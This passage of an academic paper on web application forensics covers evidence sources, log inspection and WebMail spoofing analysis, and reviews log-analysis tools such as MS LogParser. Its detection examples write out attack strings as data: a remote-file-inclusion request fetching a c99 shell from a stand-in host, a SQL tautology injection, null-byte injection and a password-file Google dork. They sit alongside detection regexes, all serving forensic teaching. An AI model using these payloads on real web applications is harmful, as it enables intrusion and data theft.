Let us summarize these drawbacks as follows. The current Webapp pen-testing approaches via
scanning tools do not deliver adequate functional coverage of modern, dynamic, highly sophisticated
Web Applications. Furthermore, the business logic of the Webapp(s) is often underestimated as a
requirement for proper pen-testing. Complete coverage of the functional mapping of the Web
Application can still not be confirmed. If the application execution flow is not explicitly known, the
questions regarding completeness and validity of the results from the tested data must be considered
open.
Therefore, Rafal Los suggests the utilization of Application-Flow Analysis (AFA) in the preparation
phase, prior to the deployment of the specific Web application scanning. This combination of the
two approaches should deliver better results than those from blind point'n'scan examinations. This
approach is illustrated in Figures 16, 17 and Tables 10, 11, 12, given in Appendix A. For more
information, please refer to [10], or consider studying the snapshot of the live presentation [L7].
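As a toy illustration of the coverage problem, the functional coverage of a point'n'scan run can be
expressed against the application-flow map; the endpoints and numbers below are invented and not
taken from [10]:

# Hypothetical application-flow map vs. what a blind scanner actually exercised.
flow_map_endpoints = {"/login", "/search", "/cart/add", "/cart/checkout", "/admin/export"}
scanned_endpoints  = {"/login", "/search", "/cart/add"}

coverage = len(scanned_endpoints & flow_map_endpoints) / len(flow_map_endpoints)
print("functional coverage: %.0f%%" % (coverage * 100))   # 60% -> the security audit is incomplete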
We should designate these statements as highly applicable to the better utilization of WAFO as well.
The lack of complete and precise knowledge of the functional structure and data flow of the
forensically observed Webapp will definitely detain the proper and accurate implementation of
WAFO. We should keep these conclusions in mind and extend them in the following chapters of the
paper.
Let us proceed with the more detailed representation of Web Application Forensics.






3. Web Application Forensics

The main task of this chapter is to proceed further with the taxonomic description of WAFO by
describing the victim environment, i.e. to designate in detail the Web application in its production
environment. This is specifically utilized to explain how Webapp forensics is applied to this
environment; to determine the main aspects of concern to WAFO; to establish these statements via
particular examples; and to outline collaborative techniques which extend the proper WAFO
investigation. See again Table 2.
We proposed in the former chapters that utilizing WAFO on the basis of best practices alone should
not be considered reasonable. Presuming this, we should emphasize further that trial-and-error
approaches and conclusions relying on personal experience and high-level skills cannot be approved
as sufficient requirements for proper WAFO deployment.
On the one hand we face a high abundance of information, considering the previously discussed
complexity aspects of RIA Webapps; on the other, the impulse to apply appropriate WAFO to these
highly sophisticated applications is immense.
Once again, this confirms the need for a proper taxonomy: not best practices presenting a recipe-like
shaping of the Web Application Forensics investigation, but categorizations approved to be
universally valid and compact in their representation. Let us conclude the illustration of the Webapp
forensics categorization and extend the taxonomic aspects described heretofore.
Respecting the post mortem strategies, after an intruder's attack has been successfully accomplished
and damage is present, we specify two general approaches for Webapp sanitization: Incident
Response (IR) and Web Application Forensics. In a word, the differences between them can be
outlined as follows. The remediation scenario applied to the compromised application, focused on
regaining the implementation's complete functionality, is the main concern of Incident Response. In
contrast, the forensics investigation focuses on gathering the maximum collection of evidence,
which is relevant for the IR utilization and can be presented to a court of jurisdiction, if required.
Let us demonstrate the complete overview of the Digital Forensics structure and point out the
dependencies between IR and DFO, as well as the dependencies between WAFO and the other
forensics fields. This is illustrated in the next Figure 3.








Figure 3: Digital Forensics: General taxonomy

For the reader concerned, please refer to [12], where IR and forensics approaches are compared in
detail. A more general representation of the topics IR and forensics can be found in [1], [13], [14].
In this line of thought, we derive and specify the following fundamental questions (*) concerning
WAFO:
   1. how can we describe an environment as ready for forensics investigations,
   2. what evidence should we look for,
   3. where is this evidence located,
   4. how can we extract the payload from the raw forensic evidence data, concerning its proper
      application in the further steps of IR.
Let us designate the general procedure for the implementation of WAFO, shown in the next Figure 4:








                            Figure 4: WAFO phases, in Jess Garcia[1]



Respecting universal validity, this illustrates the following steps in the WAFO deployment:
   •   Seizure: the problem is designated,
   •   Preliminary Analysis: preparation for the specific WAFO investigation,
   •   Investigation/Analysis loop: analyzing the collected evidence and proceeding in this manner
       till the collection of evidence is maximal and complete.
In this line of thought, we should underscore the standard tasks WAFO utilizes, as in [15]:


        1. Understand the “normal” flow of the application
        2. Capture application and server configuration files
        3. Review log files: Web Server, Application Server, Database Server, Application
        4. Identify potential anomalies: malicious input from client, breaks in normal web access
           trends, unusual referrers, mid-session changes to cookie values
        5. Determine a remediation plan

Table 5: Web Application Forensics Overview, in [15]
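As a minimal illustration of task 4 (malicious input from the client), the following Python sketch
decodes logged request lines and flags a few classic SQLIA/XSS/NBI patterns; the signatures and the
sample line are illustrative assumptions only and by no means exhaustive:

import re
from urllib.parse import unquote_plus

# Illustrative signatures only; real WAFO work requires far richer rule sets.
SIGNATURES = [
    re.compile(r"(?i)(union\s+select|or\s+'?1'?\s*=\s*'?1)"),  # classic SQLIA
    re.compile(r"(?i)<\s*script|javascript:"),                 # reflected XSS
    re.compile(r"%00"),                                        # NULL-Byte-Injection
]

def flag_request(request_line):
    decoded = unquote_plus(request_line)
    return [sig.pattern for sig in SIGNATURES
            if sig.search(decoded) or sig.search(request_line)]

sample = "GET /item.php?id=1'%20OR%20'1'='1 HTTP/1.1"
print(flag_request(sample))   # the SQLIA signature matches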


Let us categorize the evidence, as an answer to the second fundamental question, see (2,*), in
Table 6:





                                      Digital Forensics evidence:
    •   Human Testimony                                             •   Peripherals
    •   Environmental                                               •   External Storage
    •   Network traffic                                             •   Mobile Devices
    •   Network Devices                                             •   … ANYTHING !
    •   Host: Operating Systems, Databases, Applications
Table 6: A general Taxonomy of the Forensics evidence, in [1]


To specify the sources of the different forensic evidence, see (3,*), we should clarify the 'Players'
contributing to the Layer 7 communication, as Jess Garcia does in [1]; see Table 7:


                 Type of 'Players':                 … and their Implementation in the Web traffic:
                                                    Network Traffic
                     Common                         Operating Systems
                    Client Side                     ( Web) Browsers
                                                    Web Servers
                    Server Side                     Application Servers
                                                    Database Servers
Table 7: Common Players in Layer 7 Communication, in Jess Garcia [1]


A reasonable WAFO investigation should include an inspection/analysis of all evidence these 'Players'
produce, which consists of: inspecting the network traffic logs (including the logs of supportive
applications such as NIDS, IDS, IPS), analyzing the host OS logs (incl. HIPS, HIDS, event logs etc.),
inspecting headers and cookies of the users' browsers, inspecting the server logs belonging to the
Web Application Architecture, inspecting caches etc. As argued in Chapter 2, this is not a simple
task, especially when the Webapp is highly process-driven (e.g. AJAX, Silverlight, Flash etc.). Such
cases require additional application-flow analysis, which presupposes explicit knowledge of the
functional and data flow map of the Webapp. The human factor should not be underestimated in this
regard. Finally, there are also the legal aspects related to the deployment of a WAFO investigation,
which the security professional must be aware of and must respect throughout the Web Application
Forensics process. We do not discuss this matter in detail; the interested reader can find more
information on this topic in [16] and also, as already proposed, in [7]. The fourth fundamental
question, see (4,*), focusing on the extraction of the evidence payload, is discussed in more detail
in Section 3.1 of this chapter.
To conclude this discussion, let us address the leading fundamental question, which points out the
Forensics Readiness concerns, see (1,*).





An environment which is not prepared for forensic investigation in an appropriate manner:
   •   application logging is not present or not adequately adjusted,
   •   no supportive forensic tools are applied to the WAFO environment (IDS/IPS etc.),
   •   users are not well trained for forensic collaboration;
can hinder the Web Application Forensics investigation to the point that the evidence collection is
considerably incomplete and WAFO cannot be applied to the environment at all [1]. That is why the
matter of Forensics Readiness should be regarded as fundamental in the taxonomy of WAFO,
concerning the Preliminary Analysis phase of the Web Application Forensics deployment.
An illustrative example of Forensics Readiness can be found in [13], referenced in Appendix A,
Figure 18. Having specified the general taxonomy of the WAFO victim environment, let us proceed
with further examples illustrating the deployment of different Web Application Forensics
techniques. On the one hand, they make the paper's exposition more concrete; on the other hand,
they address the reasonable question of how WAFO payload data is gained from evidence in
practice.

3.1. Examples of Webapp Forensics techniques

In this section we describe different cases of WAFO deployment, concerning Client Side and
Server Side forensic analysis, based on real-life examples organized as follows: main topic,
possible attacks, illustration of the WAFO technique.


Extraneous White Space on the Request Line


This example is discussed in [3], which documents anomalies in HTTP requests stored in the
Webapp server log. Extraneous whitespace between the requested URL and the protocol version
should be considered suspicious. The next figure illustrates a poorly constructed robot, which
obviously intends to accomplish a remote file inclusion:




Figure 5: Extraneous White Space on Request Line, in [3]
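
As a minimal sketch of how such an anomaly could be flagged automatically (the log format, the
field layout and the sample entry below are assumptions for illustration and are not taken from [3]),
one can check whether the quoted request line carries more than the single space expected between
the requested URL and the protocol version:

import re

# Quoted request line inside a Common/Combined Log Format entry (hypothetical sample below).
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<rest>.*) (?P<proto>HTTP/\d\.\d)"')

def has_extraneous_whitespace(log_entry):
    """Return True if extra spaces separate the requested URL from the protocol version."""
    match = REQUEST_LINE.search(log_entry)
    if not match:
        return False  # malformed or non-standard entry; handle separately
    # a well-formed request line leaves no trailing spaces in the URL part
    return match.group("rest") != match.group("rest").rstrip()

entry = ('10.0.0.1 - - [05/Sep/2011:10:00:00 +0200] '
         '"GET /vuln.php?inc=http://evil.example/c99.txt   HTTP/1.1" 200 512')
print(has_extraneous_whitespace(entry))  # True for this hypothetical entry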

Google Dorks


Exploiting the Google search capabilities may be illustrated with the next search query [3]:




intitle:”Index of” master.passwd
The produced evidence appears in the server logs as follows:



Figure 6: Google Dorks example, in [3]

The author of the book [3] states that such requests are still very untargeted, in the sense that they
are chaotic: the target is not explicitly specified in the search query. Nevertheless, they should not
be underestimated. In this respect, the next example follows, produced by spammers utilizing the
Google search engine for the same purpose:



Figure 7: Malicious queries at Google search by spammers, in [3]
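
Requests driven by such queries often carry the search engine as referrer. As a minimal sketch of
how dork-driven visits could be flagged (the indicator terms and the sample referrer are assumptions
for illustration), one can extract the query from a Google referrer and match it against a small list
of suspicious terms:

from urllib.parse import urlparse, parse_qs

SUSPICIOUS_TERMS = ("index of", "master.passwd", "inurl:", "intitle:")  # illustrative list only

def dork_query_from_referrer(referrer):
    """Extract the search query from a Google referrer, if any."""
    parsed = urlparse(referrer)
    if "google." not in parsed.netloc:
        return None
    return parse_qs(parsed.query).get("q", [None])[0]

def looks_like_dork(referrer):
    query = dork_query_from_referrer(referrer)
    return bool(query) and any(term in query.lower() for term in SUSPICIOUS_TERMS)

# hypothetical referrer value taken from a log entry
print(looks_like_dork("http://www.google.com/search?q=intitle:%22Index+of%22+master.passwd"))  # True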

Faking a Referring URL
A great21 job of faking Referrer URL22 credentials is done by spammers. In the next example the
faked part of the URL is the anchor identifier, which is only used for navigating to different parts
of the displayed web page content. Such GET requests cannot stem from valid clicks on the Web
page, because the Web server always delivers the whole Web page and does not care about the
anchor part; thus such a log entry should be determined as malicious and, once again, as not
produced by regular Web surfing activity:


Figure 8: faked Referrer URL by spammers, in [3]
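
A minimal sketch of this observation (the sample values are hypothetical): since browsers strip the
fragment part of a URL before sending the Referer header, a logged referrer containing a '#' anchor
cannot stem from regular surfing and can be flagged directly:

from urllib.parse import urlparse

def referrer_is_suspicious(referrer):
    """Fragments (#anchor) are never transmitted in the Referer header,
    so their presence in a logged referrer indicates a forged entry."""
    return bool(urlparse(referrer).fragment)

print(referrer_is_suspicious("http://blog.example/post.html#cheap-pills"))  # True
print(referrer_is_suspicious("http://blog.example/post.html"))              # False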

Remote File Inclusion
A good example of common request URL attacks is illustrated by the next Remote File
Inclusion (RFI)23 attempt stored in the Web server log:


Figure 9: RFI, pulling c99 shell, in [3]

The attempt to pull the well-known c99 shell onto the running machine by means of a GET request
is obvious. The c99 shell is classified as a malicious PHP backdoor. There is a great likelihood that
Web intruders try to inject and execute such code on Open Source PHP Webapps, like different
PHP-based CMSes or PHP forums. In most cases RFIs are deployed to extend the structure of
compromised machines and support the utilization of botnets.


21 'great job' in terms of, discussing the algorithmic approach as security professionals and by no means as favoring the
   malicious intentions of the Cyber criminal
22 RFC 1738
23 http://projects.webappsec.org/w/page/13246955/Remote-File-Inclusion


Another reason for RFI is the attempt to execute code on the compromised machine and gain access
to sensitive data on it.
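
A minimal sketch of flagging RFI candidates in query strings (the parameter name and the sample
request are assumptions for illustration): any GET parameter whose value points to an external URL
deserves closer inspection:

import re
from urllib.parse import urlparse, parse_qsl

def rfi_candidates(request_url):
    """Return (parameter, value) pairs whose value looks like a remote URL."""
    query = urlparse(request_url).query
    return [(name, value) for name, value in parse_qsl(query)
            if re.match(r'(?i)(https?|ftp)://', value)]

# hypothetical request taken from a Web server log
print(rfi_candidates("/index.php?page=http://evil.example/c99.txt?"))
# [('page', 'http://evil.example/c99.txt?')]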
A simple Classic SQLIA
The following general example illustrates the utilization of an SQLIA [4] against a PHP Webapp by
means of a malicious GET request:




Figure 10: Simple Classic SQLIA, in [3]

The intruder tries to compromise the 'admin' account on the Webapp, utilizing a Tautologies Classic
SQLIA: ' password= ' or 1=1 - - '. In the GET request, the apostrophe, the white spaces and the
equals sign ASCII characters are substituted by %27, %20 and %3D, i.e. their URL Encoding
representations.
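
A minimal sketch of this decoding step (the tautology patterns below are illustrative only and by no
means a complete SQLIA signature set):

from urllib.parse import unquote

TAUTOLOGY = ("' or 1=1", '" or 1=1')  # illustrative patterns only

def decoded_sqlia_hint(query_string):
    """URL-decode a query string and report whether a classic tautology appears in it."""
    decoded = unquote(query_string).lower()
    return decoded, any(pattern in decoded for pattern in TAUTOLOGY)

# hypothetical GET parameters from a Web server log entry
print(decoded_sqlia_hint("user=admin&password=%27%20or%201%3D1%20--%20"))
# ("user=admin&password=' or 1=1 -- ", True)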


NULL-Byte-Injection
A NULL-Byte-Injection (NBI)24 can also be accomplished by means of a GET request, as:




Figure 11: NBI evidence in Webapp log, in [3]

In the same manner as in the former example, the NULL ASCII character is URL-encoded here as
%00. The attack tries to compromise the Perl login.cgi script, utilizing the NBI to open the
sensitive .cgi file.
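
A minimal sketch of flagging such entries (the sample request is hypothetical):

from urllib.parse import unquote

def contains_null_byte(request_path):
    """NULL bytes never occur in legitimate request URLs;
    %00 after decoding is a strong NBI indicator."""
    return "\x00" in unquote(request_path)

print(contains_null_byte("/cgi-bin/login.cgi?file=secret.doc%00.cgi"))  # True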
The provided examples illustrate different header inspection cases as part of Server Side Forensics.
This list can be extended with further paradigms related to user client Browser investigation
techniques, such as Browser Session-Restore Forensics [17], cookie inspection etc. However, we do
not consider further illustrations of WAFO techniques in this section, with respect to the boundaries
of this term paper. The interested reader should refer to [3] and [15] for more information. Let us
proceed with an example concerning WebMail forensics.

3.2. WebMail Forensics

Web based Mail (WebMail) represents a separate construct within a Web Application. Furthermore,
many firms deploy Web based mail services, like Yahoo, Amazon etc. Moreover, WebMail denotes
another data input source of a Webapp; therefore the strive to compromise Web based Mail
implementations still matters. The next Figure 12 illustrates a faked (spam) e-mail:


24 http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection





Figure 12: HTML representation of spam-mail( e-mail spoofing)

This is the last case study in the examples exposition. The spam-mail is representative of one of the
most utilized attacking techniques concerning WebMail: e-mail spoofing. To illustrate this, a
fragment of the mail header is shown in Figure 13:




Figure 13: e-mail header snippet of the spam-mail in Figure 12



Furthermore, a different supportive attacking technique is e-mail sniffing, which is not discussed in
this paper; the interested reader is referred to [18], [19]. The author of the paper received the
illustrated spam-mail in January 201125. Let us demonstrate a WebMail header inspection on the
given example, as already shown in Figure 13, which explains the e-mail spoofing attempt. On the
one hand, inspecting the Received header, the domain appears to be valid and belongs to
facebook.com26; on the other hand, the Return-Path header, as well as the X-Envelope-Sender
header, reveal a totally different sender. The domain specified there appears to belong to a home
building company in the US. Moreover, there is another domain very similar to the one in the
example: 'cedarhomes.com.au'. Inspecting the Sender header next, the sender name appears to be a
common name in Australia27. The correlation of the evidence is illustrative. More importantly, the
e-mail spoofing attempt is identified.
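
A minimal sketch of this header correlation (the header values below are hypothetical placeholders;
real values should be taken from the raw message, as in Figure 13, and the Received chain deserves
its own, separate inspection):

from email import message_from_string
from email.utils import parseaddr

def sender_domains(raw_message):
    """Collect the domains claimed by the From, Return-Path and X-Envelope-Sender
    headers; a mismatch between them hints at e-mail spoofing."""
    msg = message_from_string(raw_message)
    domains = {}
    for header in ("From", "Return-Path", "X-Envelope-Sender"):
        address = parseaddr(msg.get(header, ""))[1]
        domains[header] = address.rsplit("@", 1)[-1] if "@" in address else None
    return domains

raw = ("From: Social Network <notification@socialnetwork.example>\n"
       "Return-Path: <bounce@cedarhomes.example>\n"
       "X-Envelope-Sender: bounce@cedarhomes.example\n"
       "Subject: You have notifications pending\n\n"
       "body ...\n")
print(sender_domains(raw))
# {'From': 'socialnetwork.example', 'Return-Path': 'cedarhomes.example',
#  'X-Envelope-Sender': 'cedarhomes.example'}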
Another crucial matter also concerns the discussed spam-mail. A more detailed investigation of the
HTML content of the spam e-mail, prompted by the suspicious appearance of the hyperlink 'here',
as in Figure 12, second row from the bottom of the HTML mask: '…, please click here to
unsubscribe.', reveals the following dangerous HTML tag content, see the next Figure:




Figure 14: Spam-assassin sanitized malicious HTML redirection, from example Figure 12

It appears that the spam-mail is intelligently devised, as the intruder is not actually interested only
in spamming the e-mail accounts. With great likelihood, a receiver who does not use social
platforms, or simply dislikes receiving such e-mails, will click on the unsubscribe link, which leads
him to a malicious site. Modern versions of the Mozilla Firefox Browser can detect the
compromised and malicious domain 'promelectroncert.kiev.ua' and warn the Browser user in time,
as appropriate. This interesting example illustrates why WebMail Forensics matters.
Thus, we conclude this section and proceed to the last part of Chapter 3, concerning collaborative
approaches from other forensic investigation fields that support WAFO.

3.3. Supportive Forensics

In this section we briefly discuss the supporting role of Network, Digital Image and (OS-)Database
Forensics, which extend the evidence collection for a WAFO investigation. Log data derived from
IDS/IPS prevention systems supports a more precise detection of the intruders' activities on the
Webapp and of the IP provenance. The amount of noise the intruder produces over the network is,
as described earlier, sufficient to determine the violator's profile properly. In some cases, forensic
investigations of digital images uploaded to a compromised Web Application can lead to the
successful detection of the intruders' origins.
25 At this point, the author of the paper would like to express his gratitude to the Rechenzentrum at Ruhr-University of
   Bochum for the successful sanitization of the spam-mail, utilizing SpamAssassin right on time,
   http://www.rz.ruhr-uni-bochum.de/ , http://spamassassin.apache.org/
26 http://www.mtgsy.net/dns/utilities.php
27 http://search.ancestry.com.au


This underlines once again the reasonable suggestion to correlate the different payloads as forensic
evidence extensively, which reduces the appearance of false positives in the results and,
consequently, leads to a more precise attack detection.
A very interesting example is pointed out in [3], page 285, concerning the Sharm el Sheikh Case
Study.
Finally, we should also mention the notable case in which WAFO is hindered by a lack of sufficient
database log data. Root causes for such issues can be: concealing techniques the Web intruder
applies to cover the attack's traces, a malfunction in the database engine, a lack of proper WAFO
Readiness, i.e. the logging capabilities of the RDBMS are not adequately adjusted, etc. In such cases
a successful WAFO examination of a compromised RDBMS serving as the back-end of a Webapp
is fundamentally doubtful. Nevertheless, if the RDBMS application server has not been restarted
since the moment the attacking scenario was executed, there is a reasonable chance to extract
important forensic evidence from the RDBMS plan cache. This essential approach is discussed in
detail in [16].
In this chapter we discussed techniques for the deployment of WAFO which should be considered
manual techniques. If the observed environment is compact and the amount of relevant evidence
can be examined by a human with acceptable time and effort, expanding the collection of such
forensic techniques is undeniably fundamental and relevant.
For all that, there are many cases concerning modern Webapps in which the observation of the log
files exceeds human abilities, e.g. when the volume of logs produced by Web scanners amounts to a
couple of Gigabytes [L8].
Another example is a WAFO investigation that has to be accomplished rapidly.
In such cases the questions concerning the utilization of automated tools, enhancing the deployment
of Webapp forensics, become undoubtedly significant.
Let us introduce such tools, with respect to WAFO automation techniques, in the next Chapter 4.






4. Webapp Forensics tools

In [13], Jess Garcia proposes a categorization of the forensic approaches, separating them into two
classes: traditional forensic methods and reactive forensic methods. A good illustration of the
main parameters characterizing the two classes is given in the next table, derived from [13]:
Traditional Forensics Approaches:                  Reactive Forensics Approaches:
    •   Slow                                          •   Faster
    •   Manual                                        •   Manual/ Automated
    •   More accurate( if done properly)              •   Risk of False Positives/ Negatives
    •   More forensically Sound                       •   Less forensically Sound( ?)
    •   Older evidence                                •   Fresher evidence
Table 8: Traditional vs. Reactive forensics Approaches, in [13]

Regarding the examples in Chapter 3, we should clarify that their detection can be established only
by a well-trained security professional within an acceptable amount of time. Manually deployed
WAFO investigations can be considered very precise with a low error tolerance, though only if
applied appropriately. As mentioned above, the complexity of current Web Attacking Scenarios
makes the investigation process unacceptably slow with respect to the time aspect. Business
Webapps do not tolerate down-time, which is, however, undoubtedly required so that the Webapp
image can be processed for a reasonable WAFO. This designates the dualistic nature of a Web
Application Forensics investigation: slow and precise versus faster and error prone.

On the one hand, WAFO should be deployed uniquely for every single case of a compromised
Webapp; on the other hand, the utilization of new techniques, such as the employment of automated
tools in the WAFO investigation, will without a doubt gain new ('fresher') forensic evidence. This is
very important with respect to a maximal forensic evidence collection, as already proposed. In this
line of thought, we should stress that the utilization of new automated techniques in WAFO is only
acceptable if proper training takes place prior to their implementation in a production environment.
It is crucial to know the particular features of the automated tool which is to be utilized; to know
how the Webapp environment reacts when the tool is applied to it; to know the level of
transparency, i.e. the distance between the raw log file data and the tool's feedback as evidence
payload, etc. Let us illustrate some of the fundamental requirement parameters which designate
WAFO automated tools as appropriate for enforcement in the forensic investigation process.

4.1. Requirements for Webapp forensics tools

An essential categorization of the requirements for WAFO automated tools is given by Robert
Hansen in [L9]. We designate them as tool requirement rules (TRR), as follows:
   1. an automated tool candidate for WAFO should be able to parse log files in different formats
   2. it should be able to take two independent and differently formatted logs and combine them



    3. the WAFO tool must be able to normalize by time
    4. it should be able to handle big log files in the range of GiB
    5. it should allow utilization of regular expressions and binary logic on any observed parameter
       in the log file
    6. the tool should be able to narrow down to a subset of logical culprits
    7. the automated tool should allow implementation of white-lists
    8. it should allow the construction of a probable culprits' list, against which the security
       investigator can pivot
    9. it should also be able to maintain a list of suspicious requests which indicate a potential
       compromise
    10. the WAFO tool should support decoding of URL data so that it can be searched more easily
        in a readable format
As we will see in the further sections of this chapter, full compliance with the requirements
enumerated above is still unfeasible.
Let us give a short explanation of them, which defines them as an appropriate constitutive basis.
No matter whether a specific tool fulfils all of these requirements or not, they support a more
appropriate categorization of its capabilities and utilization area(s). As current Webapps require,
with reasonable likelihood, more than one different Web server (for example), parsing the different
log formats can be a non-trivial task. This is a fundamental reason to decide whether it is more
appropriate to utilize specialized tools, related to a specific log file format, or to look further for an
application with a wide variety of supported log data formats. Two sufficient candidates are the
Microsoft IIS file format and the Apache Web server log data format28. In this line of thought, an
important concern is how to combine the raw data from such concurrently running different Web
servers to achieve a better correlation of the evidence, provided by the proper extraction of the
payload from their log data.
Furthermore, to outline coincidences, a proper investigation of the time-stamps is required; a
normalization of time is crucial.
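
A minimal sketch of such a normalization step (the two timestamp formats below, an Apache
access-log style and a W3C/IIS style, are chosen for illustration; real deployments need more
formats and explicit time-zone handling):

from datetime import datetime, timezone

# illustrative formats: Apache access log vs. W3C/IIS extended log
FORMATS = ("%d/%b/%Y:%H:%M:%S %z", "%Y-%m-%d %H:%M:%S")

def normalize_timestamp(raw):
    """Parse a raw log timestamp and return it normalized to UTC."""
    for fmt in FORMATS:
        try:
            parsed = datetime.strptime(raw, fmt)
        except ValueError:
            continue
        if parsed.tzinfo is None:          # assume UTC when no offset is logged
            parsed = parsed.replace(tzinfo=timezone.utc)
        return parsed.astimezone(timezone.utc)
    raise ValueError("unknown timestamp format: %r" % raw)

print(normalize_timestamp("05/Sep/2011:10:00:00 +0200"))  # 2011-09-05 08:00:00+00:00
print(normalize_timestamp("2011-09-05 08:00:00"))         # 2011-09-05 08:00:00+00:00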
The matter of the sheer amount of collected log files has been discussed sufficiently above.
The aspects explaining the utilization of Regular Expressions should be designated as crucial too.
To illustrate this, let us mention the differences between implementations of Regular Expressions
on a black-list basis and those on a white-list basis, which introduces a further parameter into the
requirements list. White-listing concerns cases in which the traced payload has to match a well-
defined construction; if the observed input string deviates from this limited form, it is flagged as
suspicious. An example are Regular Expressions (RegEx) for filtering tampered data in Webapp
input fields, such as a login ID of e-mail type.
On the contrary, black-listing specifies what kind of construct is wrong and suspicious by default.
Such filters can be eluded in a simple manner by altering the injection code appropriately, so that
the RegEx fails with great likelihood to detect it.

28 Statistics for the utilization of the different Web- Server should be found at: http://news.netcraft.com/


It is a very controversial task to define a black-list RegEx which covers a whole class of malicious
strings and remains precise ('fresh'). Furthermore, it is a challenge to implement a forensic tool with
a minimal and compact collection of malicious signatures which remains universally valid.
Probability analysis, supporting a timely detection of malicious signatures, is a further challenging
topic.
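
A minimal sketch contrasting the two filtering styles on the login-ID example (both patterns are
deliberately simplified for illustration and are not production-grade signatures):

import re

# white-list: the login ID must look like an e-mail address; everything else is suspicious
WHITELIST = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# black-list: flag a few known-bad constructs; trivially eluded by re-encoding the payload
BLACKLIST = re.compile(r"('|--|<script|%00)", re.IGNORECASE)

def whitelist_suspicious(value):
    return not WHITELIST.match(value)

def blacklist_suspicious(value):
    return bool(BLACKLIST.search(value))

print(whitelist_suspicious("alice@example.com"))       # False - conforms to the expected form
print(whitelist_suspicious("admin' or 1=1 --"))        # True
print(blacklist_suspicious("admin%27%20or%201%3D1"))   # False - URL encoding eludes the black-list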
Moreover, it is very useful if the tool is extensible by the forensics investigator, in the sense that
the security professional is allowed to refresh and update the list of RegExes detecting malicious
payload manually. The examples in Sections 3.1 and 3.2 already illustrate the importance of proper
URL Encoding, which requires no further discussion here.
These conclusions support the statement that TRR 1 up to TRR 10 are relevant and fundamentally
important for proper WAFO.
Let us present a couple of interesting examples of particular WAFO automated tool candidates in
the next Sections 4.2 and 4.3. As the tools' requirements basis has already been specified, we
classify the tools in general into Open Source and proprietary ones and describe an appropriate
selection of them accordingly.

4.2. Proprietary tools

As we consider business-related Webapps as a sufficient criterion, we first describe the business-
oriented implementations of WAFO automated tools. Current representatives of this class can be
enumerated as follows: EnCase [L10], FTK [L11], Microsoft LogParser [L12], Splunk [L13] etc.
According to the WAFO tools requirements, the author of the paper selects the following favourites
in this category, see below.


Microsoft LogParser


This forensic tool was developed by Gabriele Giuseppini29. A brief history of MS LogParser is
given in [L15], [L16]. The application can be obtained and utilized for free, see [L12], though
according to [L14] Microsoft rather designates it as “skunkware” and does not give official support
for it. The current version of the tool is LogParser 2.2, released in 2005. An unofficial support site
for the tool can be found at www.logparser.com30.
The parser consists in general of the following three main units: an input engine, a SQL-like query
engine core and an output engine. A good illustration of the tool's structure is given in [L16], see
Appendix B, Figure 19. MS LogParser supports many autonomous input file formats: IIS log
files (Netmon capture logs), Event log files, text files (W3C, CSV, TSV, XML etc.), Windows
Registry databases, SQL Server databases, MS ISA Server log files, MS Exchange log files, SMTP
protocol log files, extended W3C log files (like Firewall log files) etc. Another capability of the tool
is that it can search for specific files in the observed file system and also search for specific Active
Directory objects. Furthermore, the input engine can combine the payload of different input file
formats, which allows a consolidated parsing and data correlation; thus TRR 1 and TRR 2 are
satisfied. Acceptable input data types are INTEGER, STRING, TIMESTAMP, REAL and NULL,

29 http://nl.linkedin.com/in/gabrielegiuseppini
30 Unfortunately, at the present moment this site seems to be down.


which satisfies TRR 3. According to [L17], parsing of the input data is achieved in efficient time,
which designates another positive feature of the tool. Once the data is supplied to the core engine,
the forensic examiner can query it using SQL-like queries. By default, this is done via a standard
command line console, explicitly explained in [21]. Before illustrating this with an example, let us
mention that there are unofficial front-ends providing more user-friendly GUIs, like
simpleLPview0031. However, as the domain logparser.com seems to be down during the paper's
development phase, the author of the paper is not able to test the GUI front-end. For the reader
concerned, the GUI versions of MS LogParser are not limited to that front-end. Developers can
extend the MS LogParser UI via COM objects, see [L15], which enables the forensics professional
to extend the tool's abilities by programming custom input format plug-ins.
Let us illustrate the MS LogParser syntax, see [L15]:
C:\Logs>logparser "SELECT * INTO EventLogsTable FROM System" -i:EVT -o:SQL
-database:LogsDatabase -iCheckpoint:MyCheckpoint.lpc


This example represents a SQL-like query, where the input file format specified by -i concerns the
MS Event logs; the output format is SQL, which means the results are stored in a database and can
be filtered further as appropriate. An important option is -iCheckpoint, which designates the ability
to set a checkpoint on the log files and thus achieve an incremental parsing of the observed log
data; this increases the efficiency of parsing large log files and satisfies, to some extent, TRR 4.
The next example, see [L15], demonstrates
C:\>logparser "SELECT ComputerName, TimeGenerated AS LogonTime,
STRCAT(STRCAT(EXTRACT_TOKEN(Strings, 1, '|'), '\'), EXTRACT_TOKEN(Strings, 0, '|'))
AS Username FROM \\SERVER01\Security WHERE EventID IN (552; 528) AND
EventCategoryName = 'Logon/Logoff'" -i:EVT


a simple string manipulation, which can be extended with RegExes and satisfies TRR 5 and 7.
Further interesting examples can be found in [15], [L15], [L16], [L17].
Another notable aspect of MS LogParser is its ability to execute automated tasks. One approach is
to write batch jobs for the tool and create system scheduler entries for their automated execution,
see [L14]. Furthermore, the examiner can utilize Windows scripting on top of MS LogParser, as in
[L17]; Appendix B, Figure 20 illustrates this. The standard implementation scenario is given as
follows, see [L17] (a minimal scripting sketch follows the list):
    •   register the LogParser.dll
    •   create the Logparser object
    •   define and configure the Input format object
    •   define and configure the Output format object
    •   specify the LogParser query
    •   execute the query and obtain the payload
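
As a minimal sketch of these steps in Python via pywin32/COM (the ProgIDs and method names
follow the COM interface described in [L15] and [L17] and are assumptions here, not verified
against the tool; for brevity the records are printed directly instead of configuring an output format
object):

import win32com.client  # pywin32; assumes LogParser.dll has been registered on the host

log_query = win32com.client.Dispatch("MSUtil.LogQuery")                      # the LogParser object
input_fmt = win32com.client.Dispatch("MSUtil.LogQuery.EventLogInputFormat")  # input format object

query = "SELECT TOP 20 TimeGenerated, EventID, SourceName FROM System"       # the LogParser query
records = log_query.Execute(query, input_fmt)                                # execute the query

while not records.atEnd():
    record = records.getRecord()
    # columns 0, 1, 2 correspond to TimeGenerated, EventID, SourceName
    print(record.getValue(0), record.getValue(1), record.getValue(2))
    records.moveNext()
records.close()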
This brief introduction to MS LogParser demonstrates its power without a doubt.
However, we should consider the tool appropriate only for MS Windows based
31 http://www.logparser.com/simpleLPview00.zip


environments, such as .asp, .aspx, .mspx Web applications.
An open question remains regarding the proper examination of Silverlight implementations.
Another possible issue could be the iCheckpoint option configuring the incremental parsing jobs:
locating the .lpc configuration file(s) could easily lead the intruder to the log files related to the
